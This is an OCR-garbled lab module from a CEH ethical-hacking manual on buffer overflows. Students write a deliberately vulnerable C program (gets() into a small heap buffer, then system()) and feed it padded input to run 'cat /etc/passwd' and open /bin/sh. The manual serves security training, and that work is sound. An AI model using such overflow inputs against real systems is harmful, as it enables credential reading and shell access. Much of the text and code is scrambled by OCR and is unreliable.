CEH

L ab M a n u a l

B u ffe r

O v e r flo w M o d u le 18

M odule 18 - B u ffer O verflo w

B u f f e r O v e r f lo w

tta c k

In ab u ffe ro v e r f lo w ,w h ilew ritin gda tat oabiffer, t h eb/ffer sb o u n d a r yis o v e r r u nan da d ja c e n tm e m o r yiso v e r w r it t e n .
I CON KEY
V a lu a b le i n t o r m a d o a ________

Lab Scenario
S o u r c e : h t t p : / / w w w . 1c .u 1 1ic a 1 1 1 p . b r / ~ - s t o l f i / u r n a / b u t f e r - o f l o w H a c k e r s c o n t in u o u s ly lo o k t o r v u ln e r a b ilit ie s 11 1 s o f tw a r e o r a c o m p u t e r t o b r e a k in t o th e s y s te m b y e x p lo it in g th e s e v u ln e r a b ilit ie s .

Test yo u r k n o w le d g e

sA

W e b e x e rc is e

T h e m o s t c o m m o n v u l n e r a b i l i t y o f t e n e x p l o i t e d is d i e b u f f e r o v e r f l o w
m W o r k b o o k r e v ie w

a tta c k , w h e r e

a p ro g ra m

f a ilu r e o c c u r s e ith e r 1 1 1 a llo c a t in g s u f f ic ie n t m e m o r y f o r a n i n p u t s t r in g o r h a c k e r c a n e x p lo it s u c h o v e r f lo w

1 1 1 t e s t i n g d i e l e n g d i o f s t r i n g i f i t lie s w i t h i n it s v a l i d r a n g e . A

a w e a k n e s s b y s u b m it t in g a n e x tr a - lo n g in p u t t o its a llo c a t e d i n p u t b u f f e r ( t e m p o r a r y cause th e p ro g ra m to

th e p r o g r a m , d e s ig n e d t o

s to ra g e a re a ) a n d m o d if y to u n in te n d e d p la c e s ,

th e v a lu e s o f n e a r b y o r even r e p la c e th e

v a r ia b le s ,

ju m p

p r o g r a m 's in s t m c t i o n s b y a r b it r a r y c o d e .

I f th e b u f fe r o v e r f lo w b y d ir e c d y fe e d in g th e o r d in a r y s y s te m

b u g s li e 1 1 1 a n e t w o r k s e r v ic e d a e m o n , t h e a t t a c k c a n b e d o n e p o is o n o u s in p u t s tr in g no to th e d a e m o n . I f th e b u g lie s 1 1 1 a n th e a

t o o l o r a p p lic a tio n , w i t h

d ir e c t a c c e s s , th e

h a c k e r a tta c h e s

p o is o n o u s

s tr in g w i d i a d o c u m e n t o r a n

e m a il w h ic h , o n c e

o p e n e d , w i l l la u n c h

p a s s iv e b u f f e r o v e r f lo w

a tta c k . S u c h a tta c k s a re e q u iv a le n t t o

a h a c k e r lo g g in g in t o

th e s y s te m w i d i d ie s a m e u s e r I D

a n d p r iv ile g e s a s d ie c o m p r o m is e d p r o g r a m .

B u ffe r

o v e r f lo w

bugs

a re

e s p e c ia lly

co m m o n

111

p ro g ra m s ,

s in c e

t h a t la n g u a g e m a rk

d o e s n o t p r o v id e s b u i lt - i n

a rra y b o u n d

c h e c k in g , a n d u s e s a f in a l n u l l b y te t o

t h e e n d o t a s t r in g , in s te a d o f k e e p in g it s le n g t h 1 1 1 a s e p a ra te f ie ld . T o

m ake dungs

w o r s e , C p r o v id e s m a n y lib r a r y f u n c t io n s , s u c h as s t r c a t a n d g e t l i n e , w h ic h c o p y s tr in g s w i t h o u t a n y b o u n d s - c h e c k in g . A s an e x p e rt

eth ical h a c k e r

and

p en etration te s te r,

you

m ust

have

sound

k n o w le d g e o f w h e n a n d h o w

b u f fe r o v e r f lo w

o c c u rs . Y o u m u s t u n d e rs ta n d

sta c k s-

b a se d
b u ffe r

and

h eap -b ased
111

b u f f e r o v e r flo w s , p e r f o r m and ta k e

o v e r f lo w s

p ro g ra m s ,

p r e c a u t io n s

pen etratio n te s ts f o r d e t e c t i n g t o p revent p r o g r a m s f r o m

b u f fe r o v e r f lo w

a tta c k s .

Lab Objectives
T h e o b je c t iv e o f t i n s la b is t o h e lp s tu d e n ts t o le a r n a n d p e r f o r m b u ffe r o v e r f lo w a tta c k s t o e x e c u te p a s s w o r d s .

1 1 1 t in s la b , y o u

n e e d to : o v e r f lo w b u ffe r

P r e p a re a s c r ip t t o

R u n t h e s c r ip t a g a in s t a n a p p lic a t i o n

C E H Lab Manual Page 902

Ethical Hacking and Countermeasures Copyright by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

M odule 18 - B u ffer O verflo w

P e rfo rm

p e n e tr a t io n t e s tin g f o r th e a p p lic a tio n a p a s s w o r d lis t

E n u m e ra te

& This lab can be d e m o n stra te d using B ack track Virtual M achine

Lab Environment
A A A c o m p u te r r u n n in g w ith

W indows Server 2012

as H o s t m a c h in e

V i r t u a l M a c h in e r u n n in g w i t h

B ack T rack 5 R3

w e b b ro w s e r w ith In te rn e t access

A d m in is t r a t iv e p r iv ile g e s t o 1 1 1 1 1 t o o ls

Lab Duration
T i m e : 2 0 A J in u t e s

Overview of Buffer Overflow

B u ffe r o v e r f lo w th e is an a n o m a ly w h e r e b o u n d a ry and a p r o g r a m , w h ile w n tin g d a ta to is a b u ffe r, o v e rru n s b u f f e r 's o v e r w r it e s a d ja c e n t m e m o r y . T in s a s p e c ia l

c a s e o f v io la d o n o f m e m o r y s a fe ty . B u t t e r o v e r d o w s c a n b e tr ig g e r e d b y in p u t s d ia t a re d e s ig n e d t o e x e c u te c o d e , o r a lte r th e w a y th e p r o g r a m
111

o p e r a te s . T i n s m a y r e s u lt in c o r r e c t o f m any r e s u lt s , a

e r r a tic

p ro g ra m a b re a c h

b e h a v io r , o f s y s te m

in c lu d in g

m e m o ry

access a re

e rro rs , b a s is

c ra s h , o r

s e c u r it y . T h u s ,

t lie v

th e

s o ftw a r e

v u ln e r a b ilit ie s a n d c a n b e m a lic io u s ly e x p lo it e d .

2 * TASK 1
Overview

Lab Tasks
R e c o m m e n d e d la b s t o a s s is t y o u 1 1 1 b u f f e r o v e r f l o w : E n u m e r a t in g P a s s w o rd s 11 1 D e f a u lt P a s s w o r d L is t o o o o o W r it e a C o d e C o m p ile d ie C o d e E x e c u te th e C o d e P e rfo rm B u ff e r O v e r f lo w A t ta c k

O b t a i n C o m m a n d S h e ll

Lab Analysis
A n a l y z e a n d d o c u m e n t t h e r e s u lt s r e la t e d t o t h e la b e x e r c is e . G i v e y o u r o p i n i o n o n y o u r t a r g e t s s e c u r it y p o s t u r e a n d e x p o s u r e .

P L E A S E

T A L K

T O

Y O U R

I N S T R U C T O R T O T H I S

I F

Y O U L A B .

H A V E

Q U E S T I O N S

R E L A T E D

C E H Lab Manual Page 903

Ethical Hacking and Countermeasures Copyright by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M odule 17 - B u ffer O verflo w

B u f f e r O v e r flo w

E x a m

p le

In ab / r f f e ro v e ijlo w ,w h ilew ritingda tat oab / r f f e r ,t h eb u ffe r 'sb o u n d a r yis o v e r r u nan da d ja c e n t m e m o r yiso v e r w r it t e n .
I C O N K E Y

Lab Scenario
111

/ V a lu a b le in f o r m a tio n

c o m p u te r

s e c u r it y

and

p r o g r a m m in g ,

b u ffe r

o v e r f lo w ,

0 1 b u ffe r

o v e rru n ,

y* s

v u ln e r a b ilit y a p p e a rs w h e r e a n a p p lic a tio n n e e d s t o r e a d e x t e r n a l in f o r m a t io n s u c h as

T est yo ur k n o w le d g e

a c h a r a c te r s trin g , th e s iz e o f d ie in p u t

r e c e iv in g and

b u t t e r is r e l a t i v e l y a p p lic a tio n

s m a ll c o m p a r e d check th e

to

th e

p o s s ib le b u ffe r

s tr in g ,

th e

d o e s n 't

s iz e .

T lie

W e b e x e rc is e

a l lo c a t e d a t r u n - t i m e is p l a c e d 0 1 1 a s t a c k , w h i c h k e e p s t h e i n f o r m a t i o n f o r e x e c u t i n g fu n c tio n s , s u c h o v e r f lo w in g a s lo c a l v a r ia b le s , a r g u m e n t v a r ia b le s , a n d th e re tu rn a d d re s s . T lie

W o r k b o o k r e v ie w

s t r in g c a n a lte r s u c h in f o r m a t io n . T in s

a ls o m e a n s t h a t a n a t ta c k e r c a n

c h a n g e th e in f o r m a t io n as h e 0 1 s h e w a n ts to . F o r e x a m p le , th e a tta c k e r c a n in je c t a s e r ie s o f m a c h i n e l a n g u a g e c o m m a n d s a s a s t r i n g d i a t a l s o l e a d s t o th e e x e c u tio n o f

th e a t ta c k c o d e b v c h a n g in g t h e r e t u r n a d d re s s t o t h e a d d re s s o f th e a t ta c k c o d e . T l ie u l t i m a t e g o a l is u s u a lly t o g e t c o n t r o l o f a p r iv i le g e d s h e ll b y s u c h m e t h o d s .

P r o g r a m m i n g la n g u a g e s c o m m o n l y a s s o c i a t e d w i d i b u f f e r o v e r f l o w s i n c l u d e C + + , w h ic h p r o v id e
110

and

b u ilt - in

p r o te c tio n

a g a in s t a c c e s s in g 0 1 o v e r w r i t i n g d a ta 1 1 1

a n y p a r t o f m e m o r y a n d d o n o t a u t o m a tic a lly c h e c k d ia t d a ta w r i t t e n t o a n a r r a y (th e b u ilt - in b u ffe r ty p e ) is w i d i i n th e b o u n d a r ie s o f d ia t a rra y . B ounds c h e c k in g can

p r e v e n t b u f f e r o v e r f lo w s . A s a

pen etratio n te ste r,

a tta c k s . Y o u a tta c k s . Y o u a d d re s s

y o u s h o u ld b e a b le t o im p le m e n t p r o t e c t io n be a w a re o f a ll d ie d e fe n s iv e a tta c k s

a g a in s t s t a c k fo r b u ffe r
11111-

s m a s lu n g o v e r f lo w t im e

m ust can

m e a s u re s by o f

p re v e n t b u ffe r

o v e r f lo w

im p le m e n tin g fu n c tio n s
111

checks,

o b f u s c a t io n ,

r a n d o m iz in g

lo c a tio n

lib c ,

a n a ly z in g s t a t ic s o u r c e c o d e , m a r k i n g s t a c k a s 1 1 0 1 1 - e x e c u t e , u s i n g t y p e s a fe la n g u a g e s s u c h as J a v a , M L , e tc .

Lab Objectives
T h e o b je c t iv e o f t i n s la b is t o h e lp s tu d e n ts t o le a r n a n d p e r f o r m b u ffe r o v e r f lo w t o e x e c u te p a s s w o r d s . n e e d to :

1 1 1 t in s la b , y o u

C E H Lab Manual Page 904

Ethical Hacking and Countermeasures Copyright by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M odule 17 - B u ffer O verflo w

P r e p a re a s c r ip t t o

o v e r f lo w

b u ffe r

R u n t h e s c r ip t a g a in s t a n a p p lic a t i o n P e rfo rm p e n e tr a t io n t e s tin g f o r th e a p p lic a tio n a p a s s w o r d lis t

E n u m e ra te

I T This lab can be d e m o n stra te d using B ack track Virtual M achine

Lab Environment
A A A c o m p u te r r u n n in g w ith

W indows Server 2012

as H o s t m a c h in e

Y i r m a l M a c h in e r u n n in g w i t h w e b b ro w s e r w ith

B ack T rack 5 R3

Internet a c c e s s

Administrative privileges to run tools

Lab Duration
T im e : 2 0 M in u t e s

Overview of Buffer Overflow

B u ff e r o v e r f lo w b o u n d s c h e c k in g a d ja c e n t t o th e c h a ra c te rs ta k e s p la c e w h e n

d a ta

w r itte n to a

c o rru p ts t h e d a t a v a l u e s 1 1 1 allo cated b u f f e r . M o s t o f t e n f r o m on e buffer to another.

buffer b e c a u s e o f i n s u f f i c i e n t m em ory a d d re sse s, w h i c h a r e t h i s o c c u r s w h e n c o p y i n g strin g s o f

W hen die following program is compiled and run, it will assign a block o t memory 1 1 bytes long to hold die attacker string, strcpy function will copy the string D D D D D D D D D D D D D D into an attacker string, w hich will exceed the buffer size o f 11 bytes, resulting 111 buffer overflow.

B u ffe rO v e rflo w E x a m p leC o d e

#include<stdio.h>

0123456789 1 0 1112
D D D D D D D D D D D D \ o String

int main ( int argc, char **argv)

{
char Bufferfll] = AAAAAAAAAA; strcpylBuffer/DDDDDDDDDODD;} printf(96\n. Buffer); return ;

3 4

5 6 7

8 9

10

A A A A A A A A A A

\0

1 2

S7 6

This type o f vulnerability is prevalent in UNIX and NT-based systems

Lab Tasks
S TASK 1
1. 2. Launch your B ack T rack 5 R3 Virtual Machine. For btlogui, type root and press Enter. Type the password as toor, and press E nter to log 111 to BackTrack virtual machine. W rite a Code

C E H Lab Manual Page 905

Ethical Hacking and Countenneasures Copyright by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M odule 17 - B u ffer O verflo w

BackTrack on WIN 2N9STOSGIEN Virtual Machine Connection

R * T

kVia C lipboard V iew

@3

1 h

i . 0933761 HET: Registered protocol fa n ily 17

1 .0 9 1 5 3 1 1 in p u t: A TT ra n sla ted Set 2 k e y b o a rd a s /d c1 ;icc s^ p la tfo r1 v 'i8 l> 1 2 /'s crio 0 /in p u t/'in p u tl

1.0952761 Registering the dns resolver key type 1.0957031 registered ta sk stats version 1 1.1639921 Magic nunber: 12:12U:12G 1.1644561 acpi device:01: hash notches 1.105658) rtc.cn os 00:02: settin g syste* clock to 2012-09-25 11:06:59 UTC(1340571219) 1.165468) BIOS E D O f a c il it y v0.16 2004-Jun-25, 0 devices found 1.1658621 C O D information not availab le. 1.2378181 a ta l.0 6 : ATA-8: Uirtual HD, 1 .1 .0 , raax M U D M A 2 1.2389361 a ta l.0 6 : 33554432 scctors, nu lti 12B: LBA48 1.2415511 ata2.06: AIAPI: Uirtual CD, , waxhUDt1A 2 1.2432671 ata2.06: configured for M U D I1n2 1.2441181 a ta l.0 6 : configured for flU D H flZ 1.244223) s c s i 0:0:0:6: Direct-Access A TA Uirtual H O 1 .1 . PQ: 6 AMSI: 5 1.2451571 sd 0:0:0:0: Isdal 33554432 512-byte logical blocks: (17.1 GB/16.0 GiB) 1.2455461 sd 0:0:0:0: Isdal 4096-hyte physical blocks 1.245974) sd 0:0:0:0: Isdal Write Protect Is o ff 1.2463841 sd 0:0:0:0: Attached sc si generic sgO type 0 1.2468141 sd 0:0:0:0: Isdal Urite cache: enabled, read cache: enabled, doesn't support D PT nr FIX 1.2404231 sc s i 1:0:0 0: CD R O M Hsft Uirtual CD/RO M 1.0 PQ: 6 ANSI 5 1.2515061 sr6: sc si3 nnc drive: 0x/0 k tray 1.2526091 cdron: Uniform C DH U M driver Revision: 3.26 1.2527931 sr 1:0:0:0: Attached sc si generic sg l type 5 1.25U657) sda: sdal r,da2 < xda5 > 1.2506591 *d 0:0:0:0: Inda I Att<1chd 8C5I disk 1.260263) Freeing uiuisimI kernel mmnnj; 96Hk rrixd 1.2608041 Urite protectI 1 M | the karnal read only data: 1228Hk 1.26S6241 Freeing unused kernel Mwinj: 1732k freed 1.2699051 Freeing unused kernel e 1 *nr1 j: 1492k freed ling, please w a it. . . 1.2873151 udcv: starting version 151 1.2962U0I udevd (03): /prot/U3/oun adj is deprecated, please use /p roc/tlJ/w n score adj instead. 1.3963921 Floppy driv e (s): fdO is 1.44f1 1.41 HH4 I FD C 6 is an 02070. 2.02030?) Refined T8C clocksource calibration: 3692.970 fti . .

F IG U R E 1.1: BackTrack Log in __ B u ffer overflow occurs when a program or process tries to store m ore data in a buffer.
BackTrack on WIN-2N9STOSGIEN Virtual Machine Connection Re

3.

T ype

s ta rtx

t o la u n c h d ie G U I .

1-1*

I't > (- 3 1 11 h
1.24S974I sd 0:0:6:6: (sdal Urite Protect Is o ff 1.246384) sd 0:0:6:6: Attached sc si generic sy6 type 6 1.2468141 sd 0:0:6:6: Isdal Urite cache: enabled, read cache: enabled, doesn't support DP0 or FU1 1.2404231 sc si 1:6:6:0: C DR O M Msft Uirtual C D-RO M 1 0 PQ: 6 AMSI: 5 l.25150bl sr6: sc si3 rwc drive: 0x/0x tray 1.2526091 cdrm: Uniforn CD-W* driver Revision: 3.20 1.2527931 sr !:0:6:6: Attached sc si generic sy l type 5 I .2586571 sda: sdal sda2 < sda5 > 1.2506591 sd 0:0:6 6: (sdal Attaclied SCSI disk 1.2602631 Freeing unused kernel ncmury: 'J6Uk freed 1 .2608041 N rite protecting the kernel read-only data: 122IM Ik 1.265624) Frrelny umis.d kern I fiiMitry: 1732k freed 1.269985) Freeing unused kernI nonary: 1492k freed ading, please u a i t ... 1.2873151 udev: starting version 151 1.29620BI udevd (83): /prc!c/H3/ 0jr_<1dj is deprei^ted, please use /proc/G3o1*_score_adj instead. 1.3963921 Floppy driv e (s): fd6 is 1.440 1.4133841 FK 6 la an H2678. 2.0203071 R.rfl1 d TSC clocksource calibration: 3692 .970 MHz. cklrack 5 IQ - 64 Bit bt t ty l y la tined out a fter 60 seconds.

I.V44 CSpbeard Vie

System information as of Iuc Sep 25 16:45:47 1ST 2012 Systea load: Usage o f : Oenortj usage: Swap usage: 0.08 72.3* o f 15.23GB 35 O k Processes: 72 Users logged In: 0 IP address for eth6: 10.0.0.14

Graph th is data and nrvvjr th is syste* ot https:/landscape.canonical .con

F IG U R E 1.2: BackTrack G U I Login-Startx Comm and 4.

B ackT rack 5 R3

G U I d e s k to p o p e n s , as s h o w n in d ie f o llo w in g s c r e e n s h o t.

Code w h ich is entered

in kedit is case-sensitive.

C E H Lab Manual Page 906

Ethical Hacking and Countermeasures Copyright by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

M odule 17 - B u ffer O verflo w

F IG U R E 1.3: BackTrack 5 R3 Desktop 5. S e le c t t h e

B ackT rack A pplications gedit T ext Editor.

y t. >r* /Mem (_J * ^ ^ Oik uwg* Analyzer oedlt T fcx t Editor

m e n u , a n d t h e n s e le c t

A cc esso rie s

* v
^ BackTtock

4& #***%
internet | TWmlrwl Tkrminator

flPlom ce
)14 other

WKSound 6 V^deo
0 System Tools

ca

Program ming languages

<< b a c k tra c k

com m only associated w ith buffer overflows include C and C + + .

F IG U R E 1.4: Launching gedit Text E d itor

6.

E n t e r d ie f o llo w in g c o d e 11 1 g e d it T e x t E d it o r s e n s itiv e ) .

(Note:

t h e c o d e is c a s e -

# i n c l u d e < s t d i o . h> v o i d m a i n ()

{
c h a r *name; c h a r *command; n ame =( ch ar * ) m a l l o c ( 10) ; command=(char * ) m a l l o c (128) ; p r i n t f ( " a d d r e s s o f name i s : %d\n", name) ; p r i n t f ( " a d d r e s s o f command i s : %d\n",command); p r i n t f ( " D i f f e r e n c e be twe en a d d r e s s i s : %d\ n", commandC E H Lab Manual Page 907

Ethical Hacking and Countermeasures Copyright by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

M odule 17 - B u ffer O verflo w

n ame ); p r i n t f ( " E n t e r y o ur n a m e : " ) ; gets(name); p r i n t f (" H e l l o % s \n ", n a me ) ; syst em( command) ;

}
> v x *u n s a v e d Docum ent 1 g e d it File Edit View Search Tools Documents Help ^^^Jo p e n Ii=y1 Code is compiled using the follow ing commend: gee n *Unsaved Document 1 X
# 1 nclude<std 1 0 .h> vo id m ain () char name; char command; name=(char * )m a llo c (1 0 ); command=(char * )m a llo c (1 2 8 ); p r in t f ( " a d d r e s s o f name i s : %d\n",nam e); p r in t f ( " a d d r e s s o f command is:%d\n",com m and); p r i n t f ( D iffe r e n c e between address i s :%d\n ,command-name); p r i n t f ( " E n t e r your name: ) ; g e ts(n am e); p r i n t f C H e llo %s\n",nam e); system ( command) ;

^_Save

Undo

^ 9k

buffer.c biiffer.

Plain Text

Tab Width: 8

Ln 15, Col 2

F IG U R E 1.5: W riting code fo r execution 7. N o w s a v e d ie p r o g r a m b y s e le c tin g

File )S ave A s )root

o r s im p ly c lic k

S ave
N o to o l can solve completely die problem o f buffer overflow , but die) surely can decrease the probability o f stack smashing attacks.

as s h o w n 111 th e f o llo w in g s c re e n s h o t s c re e n s h o t as b u ffe r .c . __ _* *Unsaved Document 1 g edit

File Edit View Search Tools Documents Help

N o w

la u n c h d ie c o m m a n d t e r m in a l a n d c o m p ile d ie

co d e

by

running:

Compile th e Code

gcc b u f f e r . c -o b u f f e r

C E H Lab Manual Page 908

Ethical Hacking and Countermeasures Copyright by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M odule 17 - B u ffer O verflo w

/v

root@bt: -

File Edit View Terminal Help root@ bt: # |gcc b u ffe r.c -0 b u ffe rfj

The program executes using follow ing command:

.!buffer

F IG U R E 1.7: BackTrack com piling the code 9. I f th e re a re a n y e rro rs ,

/v v X r o o tc a b t: -

ignore

th e m .

File Edit View Terminal Help ro o tg b t:-# gcc b u ffe r .c 0 b u ffe r b u ffe r .c : In fu n c tio n 'm a in ': b u f fe r . c : 6 : warning: in com p atible im p l ic i t d e c la ra tio n o f b u itfs tlH ^ u n c tio n mal

loc1 ^

b u f fe r . c : 8 : w arning: form at '%d' expects type 1 " n t ' , but a rg u m e n t^'tts s type 'ch ar b u ffe r .c :9 : warning: form at '%d' expects type , i n j ^ o u t argument 2 jM F t y p e *ch ar ' g b u f f e r . c : 1 0 : w arning: form at '%d' expects type ' i n t , but a rg um ent# has type ' I ong i n t ' /tm p/ccx6 Y 3vl.o: In fu n c tio n m a in ': b u ffe r .c : ( .te x t+ 6 x 9 0 ): warning: the g e ts ' fu n c tio n is dangerous a n ^ t a u ^ ^ i o t be used. root@bt:~# [ ]

: b a c k I tra c k
F IG U R E 1.8: BackTrack E rro r Message W in d o w

j
E x ecu te th e Code

1 0 . T o e x e c u te th e p r o g r a m

ty p e .

/buffer

C E H Lab Manual Page 909

Ethical Hacking and Countemieasures Copyright by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M odule 17 - B u ffer O verflo w

ro o t@ b t: ~

File Edit View Terminal Help r o o tg b t: # | . /b u f fe r | address o f name is : 20144144 address o f command i s :20144176 D iffe re n c e between address is :32 E nter your name:|

A n executable program

o n a disk contains a set o f binary instructions to be executed by die processor.

back
Input

t r a c k ^ )1

Enter; Jaso n

F IG U R E 1.9: BackTrack Executing Program 1 1 . T y p e a n y n a m e 1 1 1 d ie h e ld a n d p re s s h e re , u s in g as a n

exam ple.
- :v x ro o t@ b t

File Edit View Terminal Help root@bt:~# address o f address o f D iffe re n c e Enter your . /b u f f e r name is : 20144144 command i s : 26144176 between address is : 32 name:| as |

ca

B u ffer overflows w o rk

by manipulating pointers (including stored addresses).

b a ck I tra c k
F IG U R E 1.10: In p u t Field

12. Hello J a s o n

s h o u ld b e p r in t e d .

C E H Lab Manual Page 910

Ethical Hacking and Countermeasures Copyright by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M odule 17 - B u ffer O verflo w

/\

- :v

ro o t@ b t

File Edit View Terminal Help

root@bt:~# address o f address o f D iffe re n c e E n te r your ./ b u ffe r name i s : 26144144 command i s : 20144176 between address i s : 32 name: Jason

ootbt:~# fl

b a c k I tra c k
F IG U R E 1.11: H ello Jason 1 3 . N o w , o v e r f lo w t h e b u f f e r a n d e x e c u te t h e lis te d s y s te m c o m m a n d s . 14. R u n d ie p r o g r a m a g a in b y t y p i n g

T A S K

Perform Buffer Overflow A ttack

./buffer.

15. T y p e

12345678912345678912345678912345cat /e tc /p a s s w d 111 t l i e
h e ld .

Input

1 6 . Y o u c a n v ie w a p r i n t o u t o f d i e p a s s w o r d h ie .
a

ro o t@ b t: -

File Edit View Terminal Help Buffer overflow vulnerbililties typically occur in code that a programmer cannot accratelv predict buffer overflow behvior.
root@ bt:~# ./ b u ffe r address o f name i s : 17747984 address o f command i s :17748016 D iffe re n c e between address i s :32 E n te r your name:|12345678912345678912345678912345cat /etc/passwd| H e llo 12345678912345678912345678912345cat /etc/passwd r o o t: x : e : 0 : r o o t: / r o o t: /bin/bash daemon: x : 1 : 1 : daemon: /us r / s b in : /bin/sh bin:x :2 :2 :bin:/bin:/bin/sh sys : x : 3 : 3 : sys : /d e v : /bin/sh

sync: x : 4 :65534:sync: / b i n : /b in /s y n c
games: x : 5 : 60: games: /us r/games: /bin/sh

man: x : 6 : 1 2 : man: /v a r/cache/m an: /b in /s h I p : x : 7 : 7 : I p : / v a r / s p o o l/lp d : /b in /s h

m a il: x^S: 8 : m a il: /va r/m aiU / b in / sh _ news: x t : 9: news: /va r/sp o jj/n e w s: /tj^n/shg luiicp: x :1 e : l e : ifticjfc/var/spdol/uucp ijrbinTMf proxy :x: 13:13:proxy:/b1n:/b1n/sh I L w w d ata:x:3 3 :3 3 :w w w - d ata:/var/w w \*/b inft(l I I backup: x : 3 4 :34 :backup: /v a r/ b a ck u p f/ b in / sh U s t :x :3 8 :3 8 :H a ilin g L i s t H a n a g e r :/ v a r / lis t:/ b in / s h i r e : x :3 9 :3 9 :i re d : /va r / ru n / i re d : /bin/sh g n a ts :x :4 1 :4 l:G n a ts Bug-Reporting System (a d m in ):/ v a r/ lib / g n a ts :/ b in / s h ( lib u u id : x :1 0 0 :1 6 1 ::/ v a r / lib / lib u u ld : /bin/sh

F IG U R E 1.12: Executing Password 1 7 . N o w , o b t a i n a C o m m a n d S h e ll. 18. R u n d ie p r o g r a m a g a i n ./buffer a n d t y p e 12345678912345678912345678912345/ b i n / s h 111 the Input field.

m.

T A S K

Obtain Com m and Shell

C E H Lab Manual Page 911

Ethical Hacking and Countenneasures Copyright by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M odule 17 - B u ffer O verflo w

/ v

x root@ bt: -

File Edit View Terminal Help root@bt:~# . / b u f f e r address o f name is : 24616976 address o f command i s :24617008 D iffe re n c e between address is :32 E nter your nameJ12345678912345678912345678912345/bm/sh| H e llo 12345678912345678912345678912345/bin/sh s h-4.1# s h-4.1# sh-4.1# [ ]

Code scrutiny (writing

secure code) is die best possible solution to b uffe rflow attacks.

back
Exit 1 1 1

tra c k

F IG U R E 1.13: Executing 12345678912345678912345678912345/bin/sli 19. T y p e S h e ll K o n s o l e 0 1 c lo s e t h e p r o g r a m .

Lab Analysis
A n a l y z e a n d d o c u m e n t d i e r e s u lt s r e la t e d t o d i e la b e x e r c is e . G i v e y o u r o p i n i o n 0 1 1 y o u r t a r g e t s s e c u r it y p o s t u r e a n d e x p o s u r e .

T o o l/U tility

I n f o r m

a tio n

C o lle c te d /O b je c tiv e s

A c h ie v e d

A d d r e s s o f n a m e is : 2 4 6 1 6 9 7 6 A d d r e s s o f c o m m a n d is : 2 4 6 1 7 0 0 8 D iffe r e n c e b e t w e e n a d d r e s s is : 3 2

E n te r y o u r n a m e : 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 /b in / s h

B u ffe r O v e rflo w

H e llo 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 /b in /s h

s h -4 .1 # s h -4 .1 # s h -4 .1 #

P L E A S E

T A L K

T O

Y O U R

I N S T R U C T O R T O T H I S

I F

Y O U L A B .

H A V E

Q U E S T I O N S

R E L A T E D

C E H Lab Manual Page 912

M odule 17 - B u ffer O verflo w

Questions
1. 2. 3. E v a lu a t e v a r io u s m e th o d s t o A n a ly z e h o w to p r e v e n t b u f f e r o v e r f lo w . b u f f e r o v e r f lo w . e rro rs u n d e r d e te c t r u n - tim e

E v a lu a t e a n d lis t th e c o m m o n c a u s e s o f b u f f e r - o v e r f lo w .N E T la n g u a g e .

I n te r n e t

C o n n e c tio n

R e q u ir e d

Y e s

0 N

P la tf o r m

S u p p o r te d

C la s s r o o m

!L a b s

C E H Lab Manual Page 913

Ethical Hacking and Countermeasures Copyright by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.